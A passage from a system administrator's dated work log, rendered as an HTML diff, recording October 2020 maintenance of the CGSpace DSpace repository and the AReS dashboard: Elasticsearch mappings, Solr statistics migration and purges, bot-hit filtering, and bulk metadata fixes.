+</span></span><span style="display:flex;"><span><span style="color:#75715e">#   { &#34;find&#34;: &#34;alan&#34;, &#34;replace&#34;: &#34;ALAN&#34; }</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> find, replace <span style="color:#f92672">in</span> data<span style="color:#f92672">.</span>items():
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Skip all upper and all lower case strings because they are indicative of</span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># some AGROVOC or other mappings we no longer want to do</span>
+</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> find<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> find<span style="color:#f92672">.</span>islower() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>isupper() <span style="color:#f92672">or</span> replace<span style="color:#f92672">.</span>islower():
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">continue</span>
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Skip replacements with acronyms like:</span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#</span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#   International Livestock Research Institute - ILRI</span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#</span>
+</span></span><span style="display:flex;"><span>    acronym_pattern <span style="color:#f92672">=</span> re<span style="color:#f92672">.</span>compile(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;[A-Z]+$&#34;</span>)
+</span></span><span style="display:flex;"><span>    acronym_pattern_match <span style="color:#f92672">=</span> acronym_pattern<span style="color:#f92672">.</span>search(replace)
+</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> acronym_pattern_match <span style="color:#f92672">is</span> <span style="color:#f92672">not</span> <span style="color:#66d9ef">None</span>:
+</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">continue</span>
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>    mapping <span style="color:#f92672">=</span> { <span style="color:#e6db74">&#34;find&#34;</span>: find, <span style="color:#e6db74">&#34;replace&#34;</span>: replace }
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Print command for Elasticsearch</span>
+</span></span><span style="display:flex;"><span>    print(<span style="color:#e6db74">&#39;{&#34;index&#34;:</span><span style="color:#e6db74">{}</span><span style="color:#e6db74">}&#39;</span>)
+</span></span><span style="display:flex;"><span>    print(json<span style="color:#f92672">.</span>dumps(mapping))
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>f<span style="color:#f92672">.</span>close()
+</span></span></code></pre></div><ul>
+<li>It filters all upper and lower case strings as well as any replacements that end in an acronym like &ldquo;- ILRI&rdquo;, reducing the number of mappings from around 4,000 to about 900</li>
+<li>I deleted the existing <code>openrxv-values</code> Elasticsearch core and then POSTed it:</li>
+</ul>
+<pre tabindex="0"><code>$ ./convert-mapping.py &gt; /tmp/elastic-mappings.txt
+$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elastic-mappings.txt
+</code></pre><ul>
+<li>Then in AReS I didn&rsquo;t see the mappings in the dashboard until I added a new one manually, after which they all appeared
+<ul>
+<li>I started a new harvesting</li>
+</ul>
+</li>
+<li>I checked the CIMMYT DSpace repository and I see they have <a href="https://repository.cimmyt.org/rest">the REST API enabled</a>
+<ul>
+<li>The data doesn&rsquo;t look too bad actually: they have countries in title case, AGROVOC in upper case, CRPs, etc</li>
+<li>According to <a href="https://repository.cimmyt.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc">their OAI</a> they have 6,500 items in the repository</li>
+<li>I would be interested to explore the possibility to harvest them&hellip;</li>
+</ul>
+</li>
+<li>Bosede said they were having problems with the &ldquo;Access&rdquo; step during item submission
+<ul>
+<li>I looked at the Munin graphs for PostgreSQL and both connections and locks look normal so I&rsquo;m not sure what it could be</li>
+<li>I restarted the PostgreSQL service just to see if that would help</li>
+<li>She said she was still experiencing the issue&hellip;</li>
+</ul>
+</li>
+<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(192921) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-hits.sh -f /tmp/agents -s statistics -u http://localhost:8083/solr -p
+
+Purging 2474 hits from ShortLinkTranslate in statistics
+Purging 2568 hits from RI\/1\.0 in statistics
+Purging 1851 hits from ILRI Livestock Website Publications importer BOT in statistics
+Purging 1282 hits from curl in statistics
+
+Total number of bot hits purged: 8174
+</code></pre><ul>
+<li>Add &ldquo;Infographic&rdquo; to types in input form</li>
+<li>Looking into the spider agent issue from last week, where hits seem to be logged regardless of ANY spider agent patterns being loaded
+<ul>
+<li>I changed the following two options:
+<ul>
+<li><code>usage-statistics.logBots = false</code></li>
+<li><code>usage-statistics.bots.case-insensitive = true</code></li>
+</ul>
+</li>
+<li>Then I made several requests with a bot user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
+$ curl -s &#39;http://localhost:8083/solr/statistics/update?softCommit=true&#39;
+</code></pre><ul>
+<li>And I saw three hits in Solr with <code>isBot: true</code>!!!
+<ul>
+<li>I made a few more requests with user agent &ldquo;fumanchu&rdquo; and it logs them with <code>isBot: false</code>&hellip;</li>
+<li>I made a request with user agent &ldquo;Delphi 2009&rdquo; which is in the ilri pattern file, and it was logged with <code>isBot: true</code></li>
+<li>I made a few more requests and confirmed that if a pattern is in the list it gets logged with <code>isBot: true</code> despite the fact that <code>usage-statistics.logBots</code> is false&hellip;</li>
+<li>So WTF this means that it <em>knows</em> they are from a bot, but it logs them anyways</li>
+<li>Is this an issue with Atmire&rsquo;s modules?</li>
+<li>I sent them feedback on the ticket</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-21">2020-10-21</h2>
+<ul>
+<li>Peter needs to do some reporting on gender across the entirety of CGSpace so he asked me to tag a bunch of items with the AGROVOC &ldquo;gender&rdquo; subject (in CGIAR Gender Platform community, all ILRI items with subject &ldquo;gender&rdquo; or &ldquo;women&rdquo;, all CCAFS with &ldquo;gender and social inclusion&rdquo; etc)
+<ul>
+<li>First I exported the Gender Platform community and tagged all the items there with &ldquo;gender&rdquo; in OpenRefine</li>
+<li>Then I exported all of CGSpace and extracted just the ILRI and other center-specific tags with <code>csvcut</code>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;
+$ dspace metadata-export -f /tmp/cgspace.csv
+$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
+</code></pre><ul>
+<li>Then I went through all center subjects looking for &ldquo;WOMEN&rdquo; or &ldquo;GENDER&rdquo; and checking if they were missing the associated AGROVOC subject
+<ul>
+<li>To reduce the size of the CSV file I removed all center subject columns after filtering them, and I flagged all rows that I changed so I could upload a CSV with only the items that were modified</li>
+<li>In total it was about 1,100 items that I tagged across the Gender Platform community and elsewhere</li>
+<li>Also, I ran the CSVs through my <code>csv-metadata-quality</code> checker to do basic sanity checks, which ended up removing a few dozen duplicated subjects</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-22">2020-10-22</h2>
+<ul>
+<li>Bosede was getting this error on CGSpace yesterday:</li>
+</ul>
+<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1072 by user 1759
+</code></pre><ul>
+<li>Collection 1072 appears to be <a href="https://cgspace.cgiar.org/handle/10568/69542">IITA Miscellaneous</a>
+<ul>
+<li>The submit step is defined, but has no users or groups</li>
+<li>I added the IITA submitters there and told Bosede to try again</li>
+</ul>
+</li>
+<li>Add two new blocks to list the top communities and collections on AReS</li>
+<li>I want to extract all CRPs and affiliations from AReS to do some text processing and create some mappings&hellip;
+<ul>
+<li>First extract 10,000 affiliations from Elasticsearch by only including the <code>affiliation</code> source:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&amp;size=10000&amp;q=*:*&#39; &gt; /tmp/affiliations.json
+</code></pre><ul>
+<li>Then I decided to try a different approach and I adjusted my <code>convert-mapping.py</code> script to re-consider some replacement patterns with acronyms from the original AReS <code>mapping.json</code> file to hopefully address some MEL to CGSpace mappings
+<ul>
+<li>For example, to changes this:
+<ul>
+<li>find: International Livestock Research Institute</li>
+<li>replace: International Livestock Research Institute - ILRI</li>
+</ul>
+</li>
+<li>&hellip; into this:
+<ul>
+<li>find: International Livestock Research Institute - ILRI</li>
+<li>replace: International Livestock Research Institute</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I re-uploaded the mappings to Elasticsearch like I did yesterday and restarted the harvesting</li>
+</ul>
+<h2 id="2020-10-24">2020-10-24</h2>
+<ul>
+<li>Atmire sent a small version bump to CUA (6.x-4.1.10-ilri-RC5) to fix the logging of bot requests when <code>usage-statistics.logBots</code> is false
+<ul>
+<li>I tested it by making several requests to DSpace Test with the <code>RTB website BOT</code> and <code>Delphi 2009</code> user agents and can verify that they are no longer logged</li>
+</ul>
+</li>
+<li>I spent a few hours working on mappings on AReS
+<ul>
+<li>I decided to do a full re-harvest on AReS with <em>no mappings</em> so I could extract the CRPs and affiliations to see how much work they needed</li>
+<li>I worked on my Python script to process some cleanups of the values to create find/replace mappings for common scenarios:
+<ul>
+<li>Removing acronyms from the end of strings</li>
+<li>Removing &ldquo;CRP on &quot; from strings</li>
+</ul>
+</li>
+<li>The problem is that the mappings are applied to all fields, and we want to keep &ldquo;CGIAR Research Program on &hellip;&rdquo; in the authors, but not in the CRPs field</li>
+<li>Really the best solution is to have each repository use the same controlled vocabularies</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-25">2020-10-25</h2>
+<ul>
+<li>I re-installed DSpace Test with a fresh snapshot of CGSpace&rsquo;s to test the DSpace 6 upgrade (the last time was in 2020-05, and we&rsquo;ve fixed a lot of issues since then):</li>
+</ul>
+<pre tabindex="0"><code>$ cp dspace/etc/postgres/update-sequences.sql /tmp/dspace5-update-sequences.sql
+$ git checkout origin/6_x-dev-atmire-modules
+$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
+$ sudo su - postgres
+$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
+$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
+$ exit
+$ sudo systemctl stop tomcat7
+$ cd dspace/target/dspace-installer
+$ rm -rf /blah/dspacetest/config/spring
+$ ant update
+$ dspace database migrate
+(10 minutes)
+$ sudo systemctl start tomcat7
+(discovery indexing starts)
+</code></pre><ul>
+<li>Then I started processing the Solr stats one core and 1 million records at a time:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
+</code></pre><ul>
+<li>After the fifth or so run I got this error:</li>
+</ul>
+<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>So basically, as I saw at this same step in 2020-05, there are some documents that have IDs that have <em>not</em> been converted to UUID, and have <em>not</em> been labeled as &ldquo;unmigrated&rdquo; either&hellip;
+<ul>
+<li>I see there are about 217,000 of them, 99% of which are of <code>type: 5</code> which is &ldquo;site&rdquo;</li>
+<li>I purged them:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Then I restarted the <code>solr-upgrade-statistics-6x</code> process, which apparently had no records left to process</li>
+<li>I started processing the statistics-2019 core&hellip;
+<ul>
+<li>I managed to process 7.5 million records in 7 hours without any errors!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-26">2020-10-26</h2>
+<ul>
+<li>The statistics processing on the statistics-2018 core errored after 1.8 million records:</li>
+</ul>
+<pre tabindex="0"><code>Exception: Java heap space
+java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>I had the same problem when I processed the statistics-2018 core in 2020-07 and 2020-08
+<ul>
+<li>I will try to purge some unmigrated records (around 460,000), most of which are of <code>type: 5</code> (site) <del>so not relevant to our views and downloads anyways</del>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;id:/.+-unmigrated/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
+</span></span></code></pre></div><ul>
+<li>I restarted the process and it crashed again a few minutes later
+<ul>
+<li>I increased the memory to 4096m and tried again</li>
+<li>It eventually completed, after which time I purge all remaining 350,000 unmigrated records (99% of which were <code>type: 5</code>):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Then I started processing the statistics-2017 core&hellip;
+<ul>
+<li>The processing finished with no errors and afterwards I purged 800,000 unmigrated records (all with <code>type: 5</code>):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2017/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Also I purged 2.7 million unmigrated records from the statistics-2019 core</li>
+<li>I filed an issue with Atmire about the duplicate values in the <code>owningComm</code> and <code>containerCommunity</code> fields in Solr: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
+<li>Add new ORCID identifier for <a href="https://orcid.org/0000-0003-3871-6277">Perle LATRE DE LATE</a> to controlled vocabulary</li>
+<li>Use <code>move-collections.sh</code> to move a few AgriFood Tools collections on CGSpace into a new <a href="https://hdl.handle.net/10568/109982">sub community</a></li>
+</ul>
+<h2 id="2020-10-27">2020-10-27</h2>
+<ul>
+<li>I purged 849,408 unmigrated records from the statistics-2016 core after it finished processing&hellip;</li>
+<li>I purged 285,000 unmigrated records from the statistics-2015 core after it finished processing&hellip;</li>
+<li>I purged 196,000 unmigrated records from the statistics-2014 core after it finished processing&hellip;</li>
+<li>I finally finished processing all the statistics cores with the <code>solr-upgrade-statistics-6x</code> utility on DSpace Test
+<ul>
+<li>I started the Atmire stats processing:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+</code></pre><ul>
+<li>Peter asked me to add the new preferred AGROVOC subject &ldquo;covid-19&rdquo; to all items we had previously added &ldquo;coronavirus disease&rdquo;, and to make sure all items with ILRI subject &ldquo;ZOONOTIC DISEASES&rdquo; have the AGROVOC subject &ldquo;zoonoses&rdquo;
+<ul>
+<li>I exported all the records on CGSpace from the CLI and extracted the columns I needed to process them in OpenRefine:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace metadata-export -f /tmp/cgspace.csv
+$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
+</code></pre><ul>
+<li>I sanity checked the CSV in <code>csv-metadata-quality</code> after exporting from OpenRefine, then applied the changes to 453 items on CGSpace</li>
+<li>Skype with Peter and Abenet about CGSpace Explorer (AReS)
+<ul>
+<li>They want to do a big push in ILRI and our partners to use it in mid November (around 16th) so we need to clean up the metadata and try to fix the views/downloads issue by then</li>
+<li>I filed <a href="https://github.com/ilri/OpenRXV/issues/45">an issue</a> on OpenRXV for the views/downloads</li>
+<li>We also talked about harvesting CIMMYT&rsquo;s repository into AReS, perhaps with only a subset of their data, though they seem to have some issues with their data:
+<ul>
+<li>dc.contributor.author and dcterms.creator</li>
+<li>dc.title and dcterms.title</li>
+<li>dc.region.focus</li>
+<li>dc.coverage.countryfocus</li>
+<li>dc.rights.accesslevel (access status)</li>
+<li>dc.source.journal (source)</li>
+<li>dcterms.type and dc.type</li>
+<li>dc.subject.agrovoc</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>I did some work on my previous <code>create-mappings.py</code> script to process journal titles and sponsors/investors as well as CRPs and affiliations
+<ul>
+<li>I converted it to use the Elasticsearch scroll API directly rather than consuming a JSON file</li>
+<li>The result is about 1200 mappings, mostly to remove acronyms at the end of metadata values</li>
+<li>I added a few custom mappings using <code>convert-mapping.py</code> and then uploaded them to AReS:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./create-mappings.py &gt; /tmp/elasticsearch-mappings.txt
+$ ./convert-mapping.py &gt;&gt; /tmp/elasticsearch-mappings.txt
+$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elasticsearch-mappings.txt
+</code></pre><ul>
+<li>After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up</li>
+<li>I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontent container:</li>
+</ul>
+<pre tabindex="0"><code>$ docker-compose up --build -d angular_nginx
+</code></pre><h2 id="2020-10-28">2020-10-28</h2>
+<ul>
+<li>Fix a handful more of grammar and spelling issues in OpenRXV and then re-build the containers:</li>
+</ul>
+<pre tabindex="0"><code>$ docker-compose up --build -d --force-recreate angular_nginx
+</code></pre><ul>
+<li>Also, I realized that the mysterious issue with countries getting changed to inconsistent lower case like &ldquo;Burkina faso&rdquo; is due to the country formatter (see: <code>backend/src/harvester/consumers/fetch.consumer.ts</code>)
+<ul>
+<li>I don&rsquo;t understand Typescript syntax so for now I will just disable that formatter in each repository configuration and I&rsquo;m sure it will be better, as we&rsquo;re all using title case like &ldquo;Kenya&rdquo; and &ldquo;Burkina Faso&rdquo; now anyways</li>
+</ul>
+</li>
+<li>Also, I fixed a few mappings with WorldFish data</li>
+<li>Peter really wants us to move forward with the alignment of our regions to UN M.49, and the CKM web team hasn&rsquo;t responded to any of the mails we&rsquo;ve sent recently so I will just do it
+<ul>
+<li>These are the changes that will happen in the input forms:
+<ul>
+<li>East Africa → Eastern Africa</li>
+<li>West Africa → Western Africa</li>
+<li>Southeast Asia → South-eastern Asia</li>
+<li>South Asia → Southern Asia</li>
+<li>Africa South of Sahara → Sub-Saharan Africa</li>
+<li>North Africa → Northern Africa</li>
+<li>West Asia → Western Asia</li>
+</ul>
+</li>
+<li>There are some regions we use that are not present, for example Sahel, ACP, Middle East, and West and Central Africa. I will advocate for closer alignment later</li>
+<li>I ran my <code>fix-metadata-values.py</code> script to update the values in the database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-10-28-update-regions.csv
+cg.coverage.region,correct
+East Africa,Eastern Africa
+West Africa,Western Africa
+Southeast Asia,South-eastern Asia
+South Asia,Southern Asia
+Africa South Of Sahara,Sub-Saharan Africa
+North Africa,Northern Africa
+West Asia,Western Asia
+$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d
+</code></pre><ul>
+<li>Then I started a full Discovery re-indexing:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    92m14.294s
+</span></span><span style="display:flex;"><span>user    7m59.840s
+</span></span><span style="display:flex;"><span>sys     2m22.327s
+</span></span></code></pre></div><ul>
+<li>I realized I had been using an incorrect Solr query to purge unmigrated items after processing with <code>solr-upgrade-statistics-6x</code>&hellip;
+<ul>
+<li>Instead of this: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
+<li>I should have used this: <code>id:/.+-unmigrated/</code></li>
+<li>Or perhaps this (with a check first!): <code>*:* NOT id:/.{36}/</code></li>
+<li>We need to make sure to explicitly purge the unmigrated records, then purge any that are not matching the UUID pattern (after inspecting manually!)</li>
+<li>There are still 3.7 million records in our ten years of Solr statistics that are unmigrated (I only noticed because the DSpace Statistics API indexer kept failing)</li>
+<li>I don&rsquo;t think this is serious enough to re-start the simulation of the DSpace 6 migration over again, but I definitely want to make sure I use the correct query when I do CGSpace</li>
+</ul>
+</li>
+<li>The AReS indexing finished after I removed the country formatting from all the repository configurations and now I see values like &ldquo;SA&rdquo;, &ldquo;CA&rdquo;, etc&hellip;
+<ul>
+<li>So really we need this to fix MELSpace countries, so I will re-enable the country formatting for their repository</li>
+</ul>
+</li>
+<li>Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:</li>
+</ul>
+<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
+COPY 6357
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
+COPY 730
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
+COPY 71748
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.publisher&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
+COPY 3882
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.source&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
+COPY 3684
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.relation.ispartofseries&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
+COPY 5598
+</code></pre><ul>
+<li>I noticed there are still some mapping for acronyms and other fixes that haven&rsquo;t been applied, so I ran my <code>create-mappings.py</code> script against Elasticsearch again
+<ul>
+<li>Now I&rsquo;m comparing yesterday&rsquo;s mappings with today&rsquo;s and I don&rsquo;t see any duplicates&hellip;</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#39;&#34;find&#34;&#39; /tmp/elasticsearch-mappings*
+/tmp/elasticsearch-mappings2.txt:350
+/tmp/elasticsearch-mappings.txt:1228
+$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | wc -l
+1578
+$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | sort | uniq | wc -l
+1578
+</code></pre><ul>
+<li>I have no idea why they wouldn&rsquo;t have been caught yesterday when I originally ran the script on a clean AReS with no mappings&hellip;
+<ul>
+<li>In any case, I combined the mappings and then uploaded them to AReS:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/elasticsearch-mappings* &gt; /tmp/new-elasticsearch-mappings.txt
+</span></span><span style="display:flex;"><span>$ curl -XDELETE http://localhost:9200/openrxv-values
+</span></span><span style="display:flex;"><span>$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> --data-binary @/tmp/new-elasticsearch-mappings.txt
+</span></span></code></pre></div><ul>
+<li>The latest indexing (second for today!) finally finshed on AReS and the countries and affiliations/crps/journals all look MUCH better
+<ul>
+<li>There are still a few acronyms present, some of which are in the value mappings and some which aren&rsquo;t</li>
+</ul>
+</li>
+<li>Lower case some straggling AGROVOC subjects on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
+UPDATE 123
+dspace=# COMMIT;
+</code></pre><ul>
+<li>Move some top-level communities to the CGIAR System community for Peter:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace community-filiator --set --parent 10568/83389 --child 10568/1208
+$ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
+</code></pre><h2 id="2020-10-30">2020-10-30</h2>
+<ul>
+<li>The <code>AtomicStatisticsUpdateCLI</code> process finished on the current DSpace Test statistics core after about 32 hours
+<ul>
+<li>I started it on the statistics-2019 core</li>
+</ul>
